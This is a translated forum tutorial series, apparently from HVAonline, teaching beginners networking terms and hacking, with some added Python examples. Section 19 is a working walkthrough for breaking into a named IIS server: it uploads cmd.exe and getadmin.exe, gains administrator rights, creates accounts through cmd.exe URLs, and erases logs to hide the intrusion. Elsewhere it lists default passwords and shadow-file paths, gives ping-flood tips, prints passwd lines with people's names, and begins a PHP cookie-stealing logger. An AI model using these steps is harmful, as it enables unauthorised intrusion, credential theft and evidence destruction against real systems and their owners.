
Sincere thanks to the person who provided UDS with this book.

The Most Basic Knowledge for Becoming a Hacker - Part 1


Many newbies have asked me what hacking is and how to hack. But you forget one thing: first you need general background knowledge, and you need to understand the terminology that people who know networking use. I am not all that good myself, but through study I have put together some basic knowledge that I want to share with everyone so we can learn together. I will not be responsible if you use it to harm others. You may copy this or post it on other websites, but please keep the author's name under the article; respecting this article is respecting me and my effort, and it is also respecting yourselves. I have also added a few hacking and cracking techniques and basic examples which you can try out and study to understand more; when you come across a term you do not understand, read this article. I have used parts of articles I found very good on HVA's website and on other sites I have visited. Thanks to the authors of those articles. Now to the main matter.

1.) What do we need to start?

Some of you may disagree with me, but the best way to practise is to start with Windows 9x, then move on to something more powerful such as Linux or Unix. Here is what you need:
+ An OS (DOS, Windows 9x, Linux, Unix ...)
+ A good website (HVA, for instance)
+ A good web browser (Netscape, IE; the best is probably Mozilla)
+ A good chat tool (mIRC, Yahoo Messenger ...)
+ Telnet (plus a port scanner such as nmap)
+ Most important of all: anyone who wants to become a hacker must know at least a little programming (C, C++, Visual Basic, Perl ...)

2.) What is an IP address?

_ An IP address is made of 4 numbers, each in the range 0-255. Each number is stored in 1 byte, so an IP address is 4 bytes long. Addresses are divided into classes; the three main ones are A, B and C. A class A network holds about 16 million addresses, a class B network 65,536. Example: the class B network 132.25 covers every address from 132.25.0.0 to 132.25.255.255. Most class A networks belong to large companies or organisations. An ISP usually owns a few class B or class C networks. So if your IP address is 132.25.23.24 you can work out who your ISP is (whoever holds 132.25.x.x). Note that classful allocation has since been replaced by CIDR, so today the first octet no longer tells you how big the network is; a whois lookup on the address does.
_ IP stands for Internet Protocol. On the Internet each person's IP address is unique and stands for that person; computers use IP addresses to recognise the machines they are connected to. This is why you can be banned from IRC, and it is how people find your IP.

An IP address is easy to discover; people can get yours in these ways:
+ when you browse a website, your IP is logged
+ on IRC anyone can get your IP
+ on ICQ anyone can see your IP, even if you select "do not show ip"
+ if you are connected to someone, they can type "netstat -n" and see who is connected to them
+ if someone sends you an email carrying a piece of Java code that looks up your IP, they can find it too
(HVA material)

3.) How do I find my own IP address?
_ In Windows: go to Start > Run and type winipcfg.
_ In mIRC: connect to the server, then type /dns followed by your nick.
_ Through one of the websites that display your IP.

4.) What is IP spoofing?
_ An IP address is meant to identify one unique device in the world, so on a network a host can allow another device to exchange data with it without further checks. However, it is possible to change the source IP on your packets, meaning you can send forged data to another machine which will believe it came from some machine other than yours. This lets you slip past a host's checks without having control of that host. The snag is that every reply from the host goes to the device whose IP we are impersonating, so you do not get the responses you might want. In practice IP spoofing is only useful when you can do without the replies: getting past address-based filtering on a firewall, grabbing an account in a blind attack, or hiding where an attack really comes from. (HVA material)

5.) What are a trojan, a worm, a virus and a logic bomb?
_ Trojan: put simply, a spy program installed on someone else's machine to steal material from it and send it back to its owner; what it steals (passwords, accounts, cookies) depends on whoever planted it.
_ Virus: put simply, a program with special code that is installed (or spreads from another machine) onto the victim's machine and executes whatever that code demands; most viruses are used to destroy data or damage the computer.
_ Worm: a self-contained program that can copy itself and spread across the whole network. Like a virus it can destroy data or damage the network itself, sometimes bringing the network down.
_ Logic bomb: often confused with a flood or mail bomb, a program that fires many packets or messages at one address to clog the server or the line, or to terrorise an opponent. A logic bomb proper is code hidden inside a system that stays dormant until some condition (a date, an event) triggers its payload.

6.) What is PGP?
_ PGP stands for Pretty Good Privacy. It is a tool that uses public-key encryption to protect email and data files, a high-security cipher program available for MS-DOS, Unix, VAX/VMS and other systems.

7.) What is a proxy?
_ A proxy gives users access to the Internet while keeping the internal hosts hidden. Proxy servers serve a particular protocol, or a set of protocols, and run on a dual-homed host or a bastion host. Users' client programs talk to the proxy instead of the real server the user wants to reach. The proxy examines each request from the client and decides whether or not to honour it; if it does, the proxy connects to the real server on the client's behalf, relays the client's requests to that server and relays the server's responses back to the client. So a proxy server is a go-between for server and client.
_ From the user's point of view a proxy gives direct-looking access to Internet services. With a plain dual-homed host you have to log in to that host before using any Internet service, which is inconvenient and leaves people feeling that they are fighting the firewall; a proxy solves this. It may need protocol-specific support, but on the whole it is convenient for users. Because the proxy lets users reach Internet services from their own machines, no packet travels directly between the user's system and the Internet; the route is always indirect, through the dual-homed host or through the combination of bastion host and screening router. (Article by Z3RON3, HVA material)

8.) What is Unix?
_ Unix is an operating system (like Windows). It is currently the most powerful OS and the one closest to hackers. If you want to become a real hacker you cannot do without it. It was built to support programming in C.

9.) What is Telnet?
_ Telnet is a program that lets you connect to another machine on a given port. Every computer or server has ports; some common ones:
+ Port 21: FTP
+ Port 23: Telnet
+ Port 25: SMTP (mail)
+ Port 37: Time
+ Port 43: Whois
_ Example: you can use Telnet to connect to mail.virgin.net on port 25.

10.) How do I know I have telnetted into a Unix system?
_ OK, I will tell you how a Unix system greets you when you connect. First, when you call a Unix box it usually shows a prompt: Login: (this alone does not prove it is Unix, unless a banner appears before the login prompt, for instance: Welcome to SHUnix. Please log in.). At the login prompt you have to enter a valid account name; an account name is usually 8 characters or fewer. After you enter the account name you will be asked for a password; try the default passwords from the table below:

Account -------- Default password

Root         Root
Sys          Sys / System / Bin
Bin          Sys / Bin
Mountfsys    Mountfsys
Nuucp        Anon
Anon         Anon
User         User
Games        Games
Install      Install
Demo         Demo
Guest        Guest
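Sections 9, 10 and 19 all rest on the same move: connect to a port, read what the service says first, and identify it from that greeting. As an added example, not part of the original article, the Python below does that end to end: it starts a throw-away listener on 127.0.0.1 that replies with a constructed banner (modelled on the "Login:" prompt above and on the IIS FTP greeting quoted in part 2), grabs the banner the way telnet would show it, and pulls out the hostname and the default IUSR_ account name from an IIS greeting. The hostnames and banners are made up for the example.

```python
import re
import socket
import threading

# Constructed banners, modelled on the greetings quoted in the article; none is a real capture.
SAMPLE_BANNERS = {
    "unix-telnet": b"Welcome to SHUnix. Please log in.\r\nLogin: ",
    "iis-ftp": b"220 Vdodgy Microsoft FTP Service (Version 3.0).\r\n",
    "smtp": b"220 mail.virgin.net ESMTP ready\r\n",
}


def serve_banner(banner: bytes) -> tuple:
    """Start a throw-away TCP listener on 127.0.0.1 that sends `banner` to the
    first client and hangs up. Stands in for the remote host you would telnet to."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # port 0: the OS picks a free port
    srv.listen(1)
    host, port = srv.getsockname()

    def _run() -> None:
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=_run, daemon=True).start()
    return host, port


def grab_banner(host: str, port: int, timeout: float = 3.0) -> str:
    """What `telnet host port` shows first: connect and read until the service
    pauses or closes. FTP, SMTP and telnet all speak before you do."""
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            while len(data) < 1024:
                chunk = s.recv(1024)
                if not chunk:
                    break
                data += chunk
        except socket.timeout:
            pass  # the service said its piece and is waiting for us
    return data.decode("ascii", errors="replace")


def classify_banner(banner: str) -> dict:
    """Read off a banner the same facts the article reads off by eye."""
    info = {"service": "unknown", "host": None, "iusr_account": None}
    m = re.search(r"^220 (\S+) Microsoft FTP Service", banner, re.M)
    if m:
        info["service"] = "ftp (Microsoft IIS)"
        info["host"] = m.group(1)
        # Section 19: IIS creates the anonymous web account as IUSR_<MACHINE NAME>
        info["iusr_account"] = "IUSR_" + m.group(1).upper()
    elif re.search(r"^220 \S+", banner, re.M):
        info["service"] = "ftp or smtp (220 greeting)"
        info["host"] = banner.split()[1]
    elif re.search(r"^login: ?$", banner, re.I | re.M):
        info["service"] = "telnet (Unix-style login prompt)"
    return info


def probe(banner: bytes) -> dict:
    """End to end: serve a constructed banner locally, grab it, classify it."""
    host, port = serve_banner(banner)
    return classify_banner(grab_banner(host, port))


if __name__ == "__main__":
    for name, banner in SAMPLE_BANNERS.items():
        print(name, probe(banner))
```

Against a real host you would call grab_banner() with the target and port instead of serve_banner(); the classify step is where you add patterns for whatever else you meet (an SSH version line, an HTTP Server header).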

11.) What is a shell account?
_ A shell account lets you use your computer as a terminal from which you send commands to a machine running Unix. The shell is the program that interprets the characters you send and turns them into commands for Unix programs. With a real shell account you have at your disposal a workstation far more powerful than anything you could imagine. You can get a free shell account at http://www.freeshell.com/, although you cannot use telnet there until you pay for it.

12.) How can you crack Unix account passwords?
_ Very simple, but the method I describe here is out of date; you can crack them if you are lucky, otherwise treat this as reference.
_ First log in to the Unix system as a customer or a visiting guest; with luck you will get hold of the passwords kept in the standard place on such systems, /etc/passwd. Each line of the passwd file is a different account and looks like this:

CODE
userid:password:userid#:groupid#:GECOS field:home dir:shell

where:
+ userid = the user id name: the login name; it may be a name or a number.
+ password: the password hash. You know what that is for.
+ userid#: the numeric user ID, a number unique to the account, assigned when the account was created.
+ groupid#: like userid#, but the number of the group the user belongs to (the Hunter Buq group on HVA, say).
+ GECOS FIELD: where information about the user is kept: full name, phone number, address and so on. This is also a good source for cracking the password.
+ home dir: the user's home directory, the directory they land in when they log in.
+ shell: the name of the shell that starts automatically at login.
_ Take the password file, copy out the hashed text, then use "CrackerJack" or "John the Ripper" to crack it.
_ Sounds easy, doesn't it? Wrong: it is neither easy nor a matter of luck, because nowadays almost everyone hides the file carefully. Read on and you will see where the difficulty lies.

13.) What is a shadowed password?
_ A shadowed password shows itself in the Unix passwd file: where the password hash should be you see only a placeholder (such as x or *). This tells you that the passwords are kept elsewhere, in a file an ordinary user cannot read. Are we stuck then? Of course not, not a hacker. If we cannot reach the hashes through passwd, look for the file they were moved to, the shadow file. It lives in different places on different Unix systems; try the following paths in turn. The last column is the token that appears in the password field of passwd on that system:

CODE
AIX 3                   /etc/security/passwd              !
                        or /tcb/auth/files/ /
A/UX 3.0s               /tcb/files/auth/?/                *
BSD4.3-Reno             /etc/master.passwd                *
ConvexOS 10             /etc/shadpw                       *
ConvexOS 11             /etc/shadow                       *
DG/UX                   /etc/tcb/aa/user/                 *
EP/IX                   /etc/shadow                       x
HP-UX                   /.secure/etc/passwd               *
IRIX 5                  /etc/shadow                       x
Linux 1.1               /etc/shadow                       *
OSF/1                   /etc/passwd[.dir|.pag]            *
SCO Unix #.2.x          /tcb/auth/files/ /                *
SunOS 4.1+c2            /etc/security/passwd.adjunct      ##username
SunOS 5.0               /etc/shadow                       (optional NIS+ maps/tables)
System V Release 4.0    /etc/shadow                       x
System V Release 4.2    /etc/security/* database
Ultrix 4                /etc/auth[.dir|.pag]              *
UNICOS                  /etc/udb

The part before the first / on each line is the name of the system; pick the system you are really after and follow the path after that first /. And finally, here are some account lines from a passwd file I once cracked; they have probably expired by now:

CODE
arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh
arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh
aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh
armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh
arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh
arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh
aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh
arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash
arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh

To keep their secrets I erased the passwords and put the x marker in their place; see what information you can dig out of them yourselves. End of part 1. Author: Anhdenday - HVAonline
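As an added example for sections 12 and 13 above (not part of the original post), here is a small Python script that reads passwd lines in the seven-field format from section 12, sorts each account by what its password field actually tells you (a real hash, the "x" that says the hash lives in the shadow file, a locked account, or no password at all), and builds the kind of first-guess list from the GECOS field that the author recommends; this is the idea behind John the Ripper's "single" mode. The passwd lines are constructed, modelled on the author's sample, and the hash on the demo account is a made-up string, not a real crypt(3) value.

```python
from dataclasses import dataclass

# Constructed passwd lines in the 7-field format from section 12; not real accounts.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh
demo:AbCdEfGhIjKlM:1601:1000:Demo User,Room 12,555-0100:/udd/demo:/bin/ksh
games:*:5:60:games:/usr/games:/sbin/nologin
oldftp::1700:1000:Old FTP drop:/udd/oldftp:/bin/sh
"""


@dataclass
class PasswdEntry:
    user: str
    password: str   # hash, placeholder or empty
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> list:
    """Split each line on ':' into the seven fields; reject anything else."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            raise ValueError(f"not a passwd line: {line!r}")
        entries.append(PasswdEntry(f[0], f[1], int(f[2]), int(f[3]), f[4], f[5], f[6]))
    return entries


def password_status(e: PasswdEntry) -> str:
    """What the password field is telling you (section 13)."""
    p = e.password
    if p == "":
        return "empty"      # no password at all: the account logs in without one
    if p == "x":
        return "shadowed"   # hash is in /etc/shadow or the vendor file from the table
    if p.startswith(("*", "!")):
        return "locked"     # nothing can match; not worth cracking
    return "hash"           # a real hash: feed it to John / CrackerJack


def crackable(entries: list) -> list:
    """Accounts whose hash is right there in passwd (the pre-shadow situation)."""
    return [e.user for e in entries if password_status(e) == "hash"]


def gecos_candidates(e: PasswdEntry) -> list:
    """First guesses from the GECOS field and username, as section 12 suggests:
    each word as-is, lower-case, capitalised and reversed, plus the usual
    '1', '123' and doubled variants. John the Ripper's 'single' mode does this
    far more thoroughly."""
    words = {e.user}
    words.update(e.gecos.replace(",", " ").split())
    out = set()
    for w in words:
        for base in (w, w.lower(), w.capitalize(), w[::-1]):
            out.update((base, base + "1", base + "123", base * 2))
    return sorted(c for c in out if c)


if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    for e in entries:
        print(f"{e.user:8} uid={e.uid:<5} {password_status(e):9} {e.gecos}")
    for user in crackable(entries):
        e = next(x for x in entries if x.user == user)
        print(user, "->", len(gecos_candidates(e)), "candidates, e.g.", gecos_candidates(e)[:6])
```

The "empty" case is the one worth noticing: an account with nothing in the password field needs no cracking at all, and on a system where everything else is shadowed it is the only thing passwd still gives away.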

The Most Basic Knowledge for Becoming a Hacker - Part 2 [10/11/2004 3:11:00 PM]

14.) What is a port?
_ A virtual port is a natural number carried in the TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) header. As everyone knows, Windows can run many programs at once, and each program has its own port for sending and receiving data. For example, a machine with IP address 127.0.0.1 runs a web server, an FTP server, a POP3 server and so on; all these services run on the one IP address 127.0.0.1, so when a packet arrives, how does the computer know whether it is meant for the web server, the FTP server or SMTP? That is what ports are for. Each service has a default port number: FTP uses 21, the web service 80, POP3 110, SMTP 25, and so on. The administrator can change these defaults, and if you do not know the port number a service listens on, you cannot connect to it. You have probably heard of PORT MAPPING without knowing what it is or what it does. Port mapping is simply moving a service from its default port to some other number. The web server's default port is 80, but now and then you will see http://www.xxx.com:8080/ ; 8080 is the port on host xxx that the administrator has "mapped" from 80 to 8080. (HVA material)

15.) What is DNS?
_ DNS stands for Domain Name System. A DNS server listens on port 53, meaning that if you want to talk to it you connect to port 53. A DNS server translates hostnames written in letters into the corresponding numbers and back again. Example: 127.0.0.1 -> localhost and localhost -> 127.0.0.1. (HVA material)

16.) A little about WinGate:
_ WinGate is a simple program that lets you share a connection, for example one modem between two or more machines. Used with various proxies, WinGate can hide you.
_ How can WinGate hide you? Do as I do: telnet to port 23 on a host running the WinGate telnet proxy and you get the prompt WinGate>. At that prompt type the server name, a space, and the port you want to connect to. Example:

CODE
telnet wingate.net
WinGate> victim.com 23

We telnet to port 23 because that is the default port when WinGate is installed. The IP the victim's machine now records for us is the IP of the host running the WinGate proxy.
_ How to find WinGates?
+ For WinGates with a static IP (an IP that does not change), go to Yahoo or another search engine and look for cable modems: many cable-modem users run WinGate to share their big pipe with the other machines in the house. Or use a port or domain scanner and scan for port 1080.
+ For WinGates with a dynamic IP (one that changes each time the user connects), use Domscan or another scanner. With Domscan, enter any IP range in the first box and 23 in the second. When you get results, telnet to each IP found (as shown above); if the WinGate> prompt appears, you have found a machine running WinGate.
+ From experience: download a wingate scanner and play with it; there are plenty on the net.

17.) A little about Traceroute:
_ Traceroute is a program that lets you determine the path packets take from your machine to a target system on the Internet.
_ Look at this example:

CODE
C:\windows> tracert 203.94.12.54
Tracing route to 203.94.12.54 over a maximum of 30 hops
 1 abc.netzero.com (232.61.41.251)        2 ms     1 ms     1 ms
 2 xyz.Netzero.com (232.61.41.0)          5 ms     5 ms     5 ms
 3 232.61.41.10 (232.61.41.251)           9 ms    11 ms    13 ms
 4 we21.spectranet.com (196.01.83.12)   535 ms   549 ms   513 ms
 5 isp.net.ny (196.23.0.0)              562 ms   596 ms   600 ms
 6 196.23.0.25 (196.23.0.25)           1195 ms  1204 ms
 7 backbone.isp.ny (198.87.12.11)      1208 ms  1216 ms  1233 ms
 8 asianet.com (202.12.32.10)          1210 ms  1239 ms  1211 ms
 9 south.asinet.com (202.10.10.10)     1069 ms  1087 ms  1122 ms
10 backbone.vsnl.net.in (203.98.46.01)              1064 ms  1109 ms  1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms  1146 ms  1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) 1159 ms  1073 ms
13 mtnl.net.in (203.194.56.00)         1052 ms   642 ms   658 ms

I wanted to know the path from my machine to a host on the Internet with IP address 203.94.12.54, so I ran tracert on it! As you can see above, packets from my machine have to pass through 13 hops to reach 203.94.12.54. That is the path the packets take.
_ Now look at the next example:

CODE
host2 # traceroute xyz.com
traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
1 isp.net (202.xy.34.12) 20ms 10ms 10ms
2 xyz.com (202.xx.12.34) 130ms 130ms 130ms

+ The first line gives the hostname and IP address of the target. It also tells us the maximum TTL (30 hops) and the datagram size, 40 bytes (20-byte IP header + 8-byte UDP header + 12 bytes of user data).
+ The second line shows that the first router to receive the datagram is 202.xy.34.12; the datagram's TTL on arrival there was 1. That router sends traceroute an ICMP "Time Exceeded" error. Traceroute then sends another datagram towards the target, with the TTL one higher.
+ The third line: xyz.com (202.xx.12.34) receives the datagram with TTL=1 (the first router already decremented it: TTL=2-1=1). But xyz.com is not a router, and nothing listens on the UDP port traceroute aimed at, so it sends back an ICMP "Port Unreachable" error. On receiving that message traceroute knows it has reached the target xyz.com and stops.
+ If a router does not answer within 5 seconds, traceroute prints an asterisk "*" (unknown) and moves on to the next datagram!
_ Note: on Windows it is tracert hostname, on Unix traceroute hostname. (viethacker.net material)

18.) Ping and how to use it:
_ Ping is a very simple idea, yet very useful for diagnosing a network. The word comes from submarines: a submarine sends out a "ping" to find out whether there is an object nearby; if there is, the sound bounces off it and the echo, the "pong", tells the submarine something is there.
_ On the Internet ping works much like its namesake. The ping command sends an ICMP (Internet Control Message Protocol) echo request to a host; if the host "pongs" back it exists (or at least is reachable). Ping also tells us how long a data packet takes to travel from our machine to a host.
_ Ping is easy: open MS-DOS and type "ping ip_address". By default it pings 4 times, but you can also type

CODE
ping ip.address -t

which makes the machine ping without stopping. To change the ping size:

CODE
ping -l (size) ip_address
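The TTL mechanics behind section 17 are easy to lose in the output listings, so here is an added example (mine, not from the original article) that simulates them in Python: a constructed path of routers modelled on the isp.net -> xyz.com trace above, a probe function that forwards one UDP datagram hop by hop and decrements TTL the way a router does, and a traceroute loop that raises TTL from 1 until it gets "Port Unreachable" from the destination, printing "*" for a hop that stays silent past the timeout. The hostnames and addresses are made up.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Hop:
    name: str
    ip: str
    is_destination: bool = False
    silent: bool = False   # drops ICMP errors: shows up as "*" in the listing


# Constructed path modelled on the second trace in section 17; not a real capture.
SAMPLE_PATH = [
    Hop("isp.net", "202.xy.34.12"),
    Hop("core.isp.net", "202.xy.34.1"),
    Hop("xyz.com", "202.xx.12.34", is_destination=True),
]


def send_probe(path: list, ttl: int) -> tuple:
    """Forward one UDP datagram along `path`. Each router decrements TTL and, when
    it reaches 0, discards the packet and answers ICMP "Time Exceeded". The
    destination does not forward; nothing listens on traceroute's high UDP port,
    so it answers "Port Unreachable". Returns (replying hop, ICMP message)."""
    for hop in path:
        if hop.is_destination:
            reply = "Port Unreachable"
        else:
            ttl -= 1
            if ttl > 0:
                continue  # still alive: forward to the next hop
            reply = "Time Exceeded"
        if hop.silent:
            return None, None  # the reply never comes: the probe times out
        return hop, reply
    return None, None  # ran out of path (routed into a black hole)


def traceroute(path: list, max_hops: int = 30) -> list:
    """The traceroute loop: TTL 1, 2, 3, ... until the destination answers or
    max_hops is reached. Returns (ttl, name, ip) rows, '*' for silent hops."""
    rows = []
    for ttl in range(1, max_hops + 1):
        hop, msg = send_probe(path, ttl)
        if hop is None:
            rows.append((ttl, "*", "*"))
            continue
        rows.append((ttl, hop.name, hop.ip))
        if msg == "Port Unreachable":
            break
    return rows


if __name__ == "__main__":
    for ttl, name, ip in traceroute(SAMPLE_PATH):
        print(f"{ttl:2} {name} ({ip})")
```

Mark the destination itself as silent and the loop runs all the way to max_hops printing only asterisks, which is what a firewall that drops ICMP looks like in a real trace: the path is still there, you simply never hear the end of it.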

What ping does is send a packet to a computer and time how long it takes to get there and how long until it comes back; this tells you how fast the connection is and how long a packet needs to go and return (the "round-trip time"). Ping can also be used to slow down or crash a system with a ping flood. Windows 98 hangs after a minute of ping flooding (the connection buffer overflows with too many connections, so Windows decides to take a rest). A ping flood eats a great deal of your own bandwidth, and you need more bandwidth than your opponent (unless the opponent is a Windows 98 machine and you have an average modem, in which case you can knock them over after about a minute of flooding). Against a slightly stronger opponent ping flooding is not very effective, unless you have several lines and control a fair number of hosts that all ping together so that the combined bandwidth exceeds the opponent's. Note: the DOS -t option does not flood; it just pings the target repeatedly with a pause between consecutive pings. On Unix and Linux you can use ping -f to cause a real flood. Flood ping (-f) is a BSD/Linux option, not something POSIX requires, and it needs root. (HVA and viethacker.net material)

19.) Breaking into Windows NT from the Internet:
_ This is the first hacking lesson I practised when I started studying hacking, and now I will show it to you. You will need some time to carry it out; it is easy, yet hard. Let's begin:
_ First you need to find a server running IIS.
_ Next open DOS and type ftp. Example: c:\> ftp www.dodgyinc.com (this site still worked when I tried it; I do not know whether they have fixed it since. If any of you know another site, post it so everyone can try). If the connection succeeds you will see lines like these:

CODE
Connected to www.dodgyinc.com.
220 Vdodgy Microsoft FTP Service (Version 3.0).
User (www.dodgyinc.com:(none)):

What we see above contains very important information: it tells us the NetBIOS name of the computer, Vdodgy. From this you can infer the account name NT uses and which we will exploit: the default account the FTP service assigns, if it has not been renamed, is IUSR_VDODGY. Remember it; it will be useful. Enter "anonymous" as the user and this line appears:

CODE
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:

Now the password is anything we have not yet found out, but try entering anonymous as the password. If that is wrong, log in to the FTP server again, and this time do not use anonymous but Guest, and try the password guest. Now type this DOS command:

CODE
cd /c

and you will see the result if your intrusion succeeded. Now quickly look for the cgi-bin directory. With luck you will find it easily; administrators usually keep cgi-bin in the place we have just broken into so that they can manage the site more easily. The cgi-bin directory can hold programs that you can abuse to run from your web browser. Let's start making trouble.
_ First change into the cgi-bin directory and use the binary command (you may not need it), then type put cmd.exe. Next you need the hacking files to plant in this directory: look on the net for the two most important ones, getadmin.exe and gasys.dll. Download them and, once you have them, put them into cgi-bin. OK, that is all done; close the DOS window. Now type this address into your browser: http://www.dodgyinc.com/cgi-bin/getadmin.exe?IUSR_VDODGY After a few seconds you get the reply below:

CODE
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Congratulations , now account IUSR_VDODGY have administrator rights!

So you have impersonated admin to get into the system; what you need now is to create an account of your own. Type this line into IE:
http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20hacker%20toilahacker%20/add

That command line creates a login account for you (the URL as written creates user hacker with password toilahacker; in my own run the user was anhdenday). Now give this user admin rights; just type this into IE: http://www.dodgyinc.com/cgi-bin/getadmin.exe?anhdenday That's it. Disconnect, go to Start menu -> Find and search for the computer www.dodgyinc.com. When it is found, open Explore; NT Explorer opens and you enter the user and password you created (mine: user anhdenday, password toilahacker). One problem: your intrusion into this system is logged, so to cover your tracks go into Winnt\system32\logfiles, open the log file, delete the entries relating to you and save it. If you want the logs to show a different date for the intrusion, change the computer's date with this URL: http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20date%2030/04/03 When that is done, delete getadmin.exe and gasys.dll from cgi-bin. The aim of breaking into this system is to grab the admin's password so that next time we can enter legitimately, so look for the SAM file (it holds the passwords of admin and members) and crack it with L0phtCrack (I have already posted a guide to L0phtCrack 3.02; go and study it). Here is the link: http://vnhacker.org/forum/?act=ST&f=6&t=11566&s= Once cracked you have the admin's user and password, so delete your own user account (mine was anhdenday) to be safe. You can do whatever you like in the system, but do not delete their data; let them work. How do you feel, complicated isn't it? When I tried this way it took me four hours of fumbling; once you are used to it, the second time takes less. In part 3 I will cover Linux, how to break the password protection of a website, how to hack a simple website, and so on. End of part 2
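The intrusion in section 19 leaves a trail in exactly the place the section tells you to clean up, Winnt\system32\logfiles. As an added example from the defender's side (my code, not the author's), here is a Python scan over constructed IIS log lines in W3C extended format (the field order is an assumption; IIS 3.0's default log format was different, so adjust the parser to your own #Fields line). It decodes the %20-encoded query string and flags the requests the walkthrough above would generate: executables under /cgi-bin/, "net user" through cmd.exe, and a date change. The client addresses and timestamps are made up.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

# Constructed W3C extended log lines (assumed field order); not a real capture.
# Lines 3-5 mirror the requests section 19 makes; the rest are ordinary traffic.
SAMPLE_LOG = r"""#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-11-10 15:02:11 203.162.30.77 GET /index.htm - 200
2004-11-10 15:03:40 203.162.30.77 GET /cgi-bin/getadmin.exe IUSR_VDODGY 502
2004-11-10 15:04:02 203.162.30.77 GET /cgi-bin/cmd.exe /c%20c:\winnt\system32\net.exe%20user%20hacker%20toilahacker%20/add 200
2004-11-10 15:04:30 203.162.30.77 GET /cgi-bin/cmd.exe /c%20date%2030/04/03 200
2004-11-10 15:05:00 10.0.0.5 GET /products.htm - 200
2004-11-10 15:05:09 10.0.0.5 GET /cgi-bin/counter.pl page=products 200
"""

# (pattern, field it applies to, reason). Stems are matched raw, queries after URL-decoding.
RULES = [
    (re.compile(r"/cgi-bin/[^/]+\.(exe|dll)$", re.I), "stem", "executable or DLL under /cgi-bin/"),
    (re.compile(r"\bnet(\.exe)?\s+user\b", re.I), "query", "net user via web request"),
    (re.compile(r"(^|\s)date\s", re.I), "query", "system clock change via web request"),
]


@dataclass
class Finding:
    line_no: int
    client: str
    stem: str
    query: str
    reasons: list = field(default_factory=list)


def scan_log(text: str) -> list:
    """Run every rule over every request line; one Finding per flagged line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        if len(parts) != 7:
            continue  # not our field layout; do not guess
        _date, _time, client, _method, stem, query, _status = parts
        query = "" if query == "-" else unquote(query)  # %20 -> space, as cmd.exe saw it
        reasons = [why for rx, where, why in RULES
                   if rx.search(stem if where == "stem" else query)]
        if reasons:
            findings.append(Finding(n, client, stem, query, reasons))
    return findings


def attackers(findings: list) -> dict:
    """Flagged line numbers grouped by client address, the thing to pivot on next."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f.client, []).append(f.line_no)
    return by_ip


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"line {f.line_no} {f.client} {f.stem} {f.query!r}: {', '.join(f.reasons)}")
    print(attackers(hits))
```

Since the walkthrough ends by editing the log file on the server itself, a scan like this only helps if the log has already left the box: ship it to another host as it is written, and the deleted lines stay deleted only locally.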

Author: Anhdenday - HVAOnline.net

The Most Basic Knowledge for Becoming a Hacker - Part 3 [12/7/2004 10:33:00 AM]

20.) What is a cookie?
_ Cookies are small structured pieces of data shared between a website and the user's browser. They are stored in small text files (under 4 KB). Sites create them to store, retrieve and recognise information about the users who visit the site and the areas of the site they pass through. That information can include the user's name or identifier, password, preferences, habits... The cookie is accepted by the user's browser and stored on their hard disk; not every browser supports cookies. After one visit to a site, information about the user is stored in the cookie; on later visits the site can reuse the information in the cookie (the login details for a forum, for example) so the user does not have to log in again or re-enter other details. The problem is that many sites handle the reuse of cookie data carelessly, check it incompletely or encode it weakly, which lets a hacker get past the login and take control of the site.
_ A cookie usually has these parts:
+ Name: chosen by the site's programmer
+ Domain: the domain of the server that created and sent the cookie
+ Path: the part of the site's URL space the cookie applies to
+ Expiry date: the moment the cookie stops being valid
+ Secure: if this flag is set, the browser only sends the cookie over an encrypted (HTTPS) connection; it does not mean the cookie's contents are encrypted
+ Other values: the data the web server stores to identify the user later; these values contain no spaces, dots or commas and are limited to 4 KB. (Viethacker.net material)

21.) Stealing a victim's cookie:
_ First open notepad and paste this code in:

CODE
<?php
define("LINE", "\r\n");
define("HTML_LINE", "<br>");

// Print and return every key/value in $arr, with an optional title line.
function getvars($arr, $title) {
    $res = "";
    if (count($arr) > 0) {
        if (strlen($title) > 0) {
            print("[--------$title--------]" . HTML_LINE);
            $res .= "[--------$title--------]" . LINE;
        }
        foreach ($arr as $key => $value) {
            print("[$key]" . HTML_LINE);
            print($value . HTML_LINE);
            $res .= "[$key]" . LINE . $value . LINE;
        }
    }
    return $res;
}

// current date and time as a header for this visit
$now = date("Y-m-d H:i:s");
$myData = "[-----$now-----]" . LINE;
// every GET parameter: the stolen cookie arrives as one of them
$myData .= getvars($_GET, "");
// one log file per visitor IP, e.g. 203.162.30.77.txt
$file = $_SERVER['REMOTE_ADDR'] . ".txt";
$fp = fopen($file, file_exists($file) ? "r+" : "w+");
